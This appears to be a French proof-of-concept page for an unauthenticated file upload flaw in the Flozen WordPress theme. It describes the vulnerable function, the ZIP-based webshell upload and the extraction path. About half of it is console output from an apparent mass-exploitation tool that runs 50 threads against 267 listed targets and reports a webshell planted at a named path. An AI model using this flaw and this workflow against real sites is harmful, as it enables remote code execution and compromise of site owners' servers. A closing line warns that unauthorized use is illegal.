
POC
Flozen < 1.5.1 - Téléversement arbitraire de fichier sans authentification
Thème Flozen < 1.5.1 - Téléversement arbitraire de fichier sans authentification
Description
Le thème Flozen pour WordPress (versions jusqu'à 1.5.1 incluse) est vulnérable à un téléversement arbitraire de fichier sans authentification, en raison de l'absence de contrôles d'authentification et d'une validation insuffisante des types de fichiers dans la fonction flozen_add_new_custom_font(). Cela permet à des attaquants non authentifiés de téléverser des fichiers ZIP arbitraires contenant du code PHP malveillant (par exemple, des webshells), qui sont automatiquement extraits vers wp-content/uploads/nasa-custom-fonts/, conduisant à une exécution de code à distance (RCE) complète.
~ Score CVSS : 9.8 (Critique)
~ Versions concernées : < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
L'utilisation non autorisée de systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale.